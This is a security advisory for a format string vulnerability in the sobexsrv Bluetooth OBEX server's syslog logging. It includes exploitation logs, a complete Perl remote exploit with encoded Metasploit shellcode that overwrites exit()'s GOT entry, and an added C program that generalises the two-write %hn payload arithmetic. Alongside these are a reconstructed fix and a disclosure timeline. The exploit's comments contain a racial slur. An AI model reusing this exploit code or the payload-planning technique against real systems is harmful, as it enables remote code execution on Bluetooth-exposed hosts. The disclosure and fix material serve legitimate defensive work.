sobexsrv is "a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory listing) and therefore is a full OBEX server. sobexsrv was designed with flexibility and security in mind".
A format string vulnerability has been discovered in the sobexsrv secure scripting OBEX server. When syslog logging (-S) is enabled, path names supplied by the remote Bluetooth client reach syslog(3) as the format argument, which lets the client read from and write to the daemon's memory and, as shown below, execute code with the daemon's privileges.
Credit:
The information has been provided by Kevin Finisterre.
Vulnerable Systems:
* sobexsrv 1.0.0 pre-releases up to and including 1.0.0_pre3 (the source quoted below is 1.0.0_pre3)
Immune Systems:
* sobexsrv 1.0.0pre4
Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp.
sobexsrv -IS -r /tmp
Simple secure setup with chroot and Bluetooth security mode-2.
sobexsrv -s 2 -ISR -l X -r /tmp
Both setups above pass -S, which enables syslog logging. The format string bug sits in that logging path: dosyslog() expands the server's message and the client-supplied path into a buffer and then hands that buffer to syslog(3) as the format argument (obexsrv.c:71, syslog(LOG_INFO, log)), so any conversion directive in a remote file or folder name is interpreted by syslog(). Every dosyslog() call that logs a client-controlled path (folder listing, pull, push, delete, mkdir) is affected:
kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71: syslog(LOG_INFO, log);
...
./src/obexsrv.c:203: dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290: if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291: else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334: if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335: else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356: if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357: else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401: dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406: dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
...
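The following is an added example, not sobexsrv's own code: it reconstructs the call shape the grep shows (a dosyslog(m1, m2, m3) helper that formats once into a buffer and then passes the buffer to syslog()), places the fixed form next to it, and adds a small audit helper that counts the directives a client-supplied name would inject. The body of the real dosyslog() is assumed; only the signature and the syslog(LOG_INFO, log) call are taken from the page, and the sample path is constructed to mirror the probe used further down.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/*
 * Added example reconstructing the vulnerable pattern in sobexsrv-1.0.0_pre3's
 * dosyslog(); the function body is assumed, the call shape is from the page.
 *
 * Stage 1 is identical in both versions and is safe: m1 is always one of the
 * server's own literal formats ("created directory \"%s\"\n" etc.) and the
 * client-supplied path only ever fills its %s. Returns the length produced.
 */
static int build_log_line(char *log, size_t cap, const char *m1,
                          const void *m2, const void *m3)
{
    return snprintf(log, cap, m1, m2, m3);
}

/*
 * Stage 2 as shipped: `log` becomes the FORMAT of a second printf-family
 * call. A path such as "--AAAABBBB%19$x.%20$x" is now parsed for directives,
 * which is the leak visible in the syslog excerpt below; "%hn" turns the same
 * bug into a write. The pragma only silences the compiler's own warning
 * (-Wformat-security) about exactly this construct.
 */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
static void dosyslog_unsafe(const char *m1, const void *m2, const void *m3)
{
    char log[512];
    build_log_line(log, sizeof log, m1, m2, m3);
    syslog(LOG_INFO, log);              /* BUG: client data used as format */
}
#pragma GCC diagnostic pop

/* Fixed: client data is only ever an ARGUMENT to a literal format. */
static void dosyslog_fixed(const char *m1, const void *m2, const void *m3)
{
    char log[512];
    build_log_line(log, sizeof log, m1, m2, m3);
    syslog(LOG_INFO, "%s", log);
}

/*
 * Audit helper: number of conversion directives printf-family code would act
 * on if `s` were used as a format ("%%" is a literal percent, not a
 * directive). Any nonzero count in a remote path is input that makes
 * dosyslog_unsafe() dangerous; dosyslog_fixed() simply logs it verbatim.
 */
static int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        n++;
    }
    return n;
}

int main(void)
{
    /* constructed sample, same shape as the folder name used in the probe below */
    const char *path = "/tmp//--AAAABBBB%19$x.%20$x";
    char line[512];

    build_log_line(line, sizeof line, "created directory \"%s\"\n", path, 0);
    printf("logged verbatim by the fixed version: %s", line);
    printf("directives the unsafe version would interpret: %d\n",
           count_directives(path));
    dosyslog_fixed("created directory \"%s\"\n", path, 0);   /* harmless */
    dosyslog_unsafe("[client] connected\n", 0, 0);           /* no client data, so harmless here */
    return 0;
}
```

The fix the author shipped is the one-token change from syslog(LOG_INFO, log) to syslog(LOG_INFO, "%s", log); count_directives() is the check to run over any string that is about to be passed where a format is expected.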
For a quick verification, a Windows machine running the Widcomm Bluetooth stack was used to create a folder named "--AAAABBBB%19$x.%20$x" on the remote host; the OBEX FTP interface behind the My Bluetooth Places icon is all that is needed. The two positional %x directives read the 19th and 20th argument slots, which on this stack lie inside the folder name itself, so the leaked 41414141.42424242 is the AAAABBBB marker and confirms that the name is being parsed as a format string:
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting...
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---AAAABBBB41414141.42424242"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting...
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected
The host in this example is a PowerPC Linux box so keep in mind that the x86 offsets will differ.
Exploiting this is straightforward. The server is run in debug mode (-d) so that the request handling is visible, and the attack is delivered with a scripted ussp-push (the script is given under Exploit below).
kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for
"/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
length=201
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid=1000(kfinisterre) gid=1000(kfinisterre)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)
The pushed file body was executed as shellcode: a /bin/sh payload that ran /usr/bin/id with the daemon's uid, whose output appears at the end of the daemon's debug log above.
The same run from the attacker's point of view:
animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl
pushing file /tmp/shellcode
name=/tmp/shellcode, size=201
Registered transport
set user data
created new objext
Local device 00:11:B1:07:BE:A7
Remote device 00:0B:0D:63:0B:CC (1)
started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
path: /tmp/shellcode, size: 201
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!
Exploit:
#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch!
#
# Value to plant in the GOT slot: presumably where the pushed file body (the
# shellcode below) lands in the daemon's memory. The OBEX name header is
# Unicode (UTF-16), so due to unicode the filename is NOT usable for
# shellcode. Must use file contents. Offsets are for the author's x86 build.
$retloc = 0x8053418;
# R_386_JUMP_SLOT exit(): the GOT entry for exit(), overwritten one 16-bit half
# at a time. $addy (positional argument 27) is the high half at slot+2,
# $addy2 (argument 28) the low half at the slot itself (little-endian).
$addy = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";
# Split the target into halves. 0x38 bytes of log line precede the first %hn,
# so they are subtracted from the first width. The second width is padded by
# 0x10000 so it stays positive; %hn keeps only the low 16 bits of the running
# count, so the surplus is harmless. "%<w>.d" with precision 0 prints exactly
# w characters, which keeps the count exact.
$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;
$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;
#print "hi: $hi\n";
#print "lo: $lo\n";
# ussp-push <bdaddr>@<channel> <local file> <remote name>: the remote name
# carries the format string, the local file carries the payload. The \\\$
# keeps the shell spawned by system() from expanding $hn.
$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";
$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";
open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);
system($string);
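The arithmetic behind the two %hn writes above, written out generally as an added example (not part of the advisory or of sobexsrv.pl). It assumes a little-endian x86 target as the script does, and takes the script's constants as its sample input: GOT slot for exit() at 0x08051958 (high half at 0x0805195a), desired value 0x08053418, 0x38 bytes already emitted before the first directive, and positional arguments 27 and 28. Unlike the script, which adds 0x10000 to the second width unconditionally (76819), the planner below adds it only when a width would be too small to pad reliably, giving 11283; both leave the same low 16 bits, which the simulator checks.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: the two-write %hn plan used by the exploit, generalised.
 * Sample constants are the script's; the target is assumed little-endian. */

struct hn_plan {
    uint32_t slot;       /* address of the 4-byte slot being overwritten */
    uint32_t addr[2];    /* addresses written, in write order */
    unsigned width[2];   /* "%<width>.d" padding emitted before each %hn */
    int      arg[2];     /* positional argument that holds each address */
};

/* Each %hn stores the low 16 bits of the running character count, so the two
 * halves are written in ascending order and each width is the distance
 * (mod 0x10000) from the count reached so far to the half wanted next. A
 * width below MINW gets a full 0x10000 added: the surplus vanishes in the
 * truncation but keeps the field wide enough to be padded exactly. */
#define MINW 8
static struct hn_plan plan_hn_writes(uint32_t slot, uint32_t value,
                                     unsigned already_written, int first_arg)
{
    struct hn_plan p = { .slot = slot };
    uint16_t lo = value & 0xffff, hi = value >> 16;
    uint32_t lo_addr = slot, hi_addr = slot + 2;   /* little-endian layout */
    int hi_first = hi < lo;
    uint16_t half[2]  = { hi_first ? hi : lo, hi_first ? lo : hi };
    uint32_t where[2] = { hi_first ? hi_addr : lo_addr,
                          hi_first ? lo_addr : hi_addr };
    unsigned count = already_written;

    for (int i = 0; i < 2; i++) {
        unsigned w = (half[i] - count) & 0xffff;
        if (w < MINW) w += 0x10000;
        p.addr[i]  = where[i];
        p.width[i] = w;
        p.arg[i]   = first_arg + i;
        count += w;
    }
    return p;
}

/* Emulate the target: apply the planned writes to a 4-byte little-endian
 * slot and return what it holds afterwards. A width carrying a surplus
 * 0x10000 (the script's 76819) is truncated by %hn just like any other. */
static uint32_t simulate_hn_writes(const struct hn_plan *p, unsigned already_written)
{
    uint8_t mem[4] = { 0 };
    unsigned count = already_written;

    for (int i = 0; i < 2; i++) {
        count += p->width[i];
        uint32_t off = p->addr[i] - p->slot;      /* 0 or 2 */
        mem[off]     = count & 0xff;
        mem[off + 1] = (count >> 8) & 0xff;
    }
    return mem[0] | mem[1] << 8 | mem[2] << 16 | (uint32_t)mem[3] << 24;
}

/* Render the directive part of the remote file name the way the script
 * builds it, e.g. "%1997.d%27$hn%11283.d%28$hn" for the plan above. */
static int render_directives(const struct hn_plan *p, char *out, size_t cap)
{
    return snprintf(out, cap, "%%%u.d%%%d$hn%%%u.d%%%d$hn",
                    p->width[0], p->arg[0], p->width[1], p->arg[1]);
}

/* Why ".d": precision 0 with a 0 argument prints no digits, so the field is
 * exactly `width` characters and the count stays predictable. */
static int field_length(unsigned width)
{
    return snprintf(NULL, 0, "%*.d", (int)width, 0);
}

int main(void)
{
    struct hn_plan p = plan_hn_writes(0x08051958u, 0x08053418u, 0x38, 27);
    char buf[64];

    render_directives(&p, buf, sizeof buf);
    printf("directives: %s\n", buf);
    printf("slot after writes: 0x%08x\n", simulate_hn_writes(&p, 0x38));
    printf("\"%%1997.d\" with a 0 argument is %d characters\n", field_length(1997));
    return 0;
}
```

The PowerPC note above applies here too: only the widths and argument positions are generic, the slot address, the planted value and the 0x38 prefix length all have to be re-derived for each binary and stack layout.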
Workaround:
The author issued the following temporary warning before patching the problem:
"the syslog (-S) function of sobexsrv is vulnerable to a format string attack and therefore should not be used as of now!"
Fixed versions are available at the following locations.
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz
http://www.mulliner.org/bluetooth/sobexsrv_1.0.0pre4-1_i386.deb
http://www.mulliner.org/nokia770/feed/sobexsrv_1.0.0pre4-1_arm.deb (maemo binary)
Disclosure Timeline:
* 03.11.05 - sobexsrv posted to trifinite.blog by Collin Mulliner
* 23.11.05 - vendor notification
* 25.11.05 - sobexsrv-1.0.0pre4.tar.gz released